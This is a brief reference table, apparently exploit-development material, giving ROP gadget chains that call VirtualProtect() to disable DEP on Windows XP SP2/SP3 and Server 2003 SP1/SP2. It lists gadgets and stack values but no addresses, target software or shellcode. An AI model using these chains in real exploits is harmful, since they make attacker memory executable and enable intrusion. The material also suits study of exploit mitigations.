WINDOWS XP SP2 / WINDOWS XP SP3

Gadget                                  Value on stack / purpose
POP EBP # RETN                          skip 4 bytes
POP EBX # RETN                          0x00000400 -> ebx
POP EDX # RETN                          0x00000040 -> edx
POP ECX # RETN                          Writable location
POP EDI # RETN                          RETN (ROP NOP)
POP ESI # RETN                          JMP [EAX]
POP EAX # RETN                          ptr to VirtualProtect()
PUSHAD # RETN                           ptr to 'push esp # ret'

WINDOWS SERVER 2003 SP1 / WINDOWS SERVER 2003 SP2

Gadget                                  Value on stack / purpose
POP EAX # RETN                          ptr to VirtualProtect()
MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN   Filler
XCHG EAX,ESI # RETN
POP EBP # RETN                          PUSH ESP # RETN
POP EBX # RETN                          0x00000400 -> ebx
POP EDX # RETN                          0x00000040 -> edx
POP ECX # RETN                          Writable location
POP EDI # RETN                          RETN (ROP NOP)
POP EAX # RETN                          nop
PUSHAD # ADD AL,0EF # RETN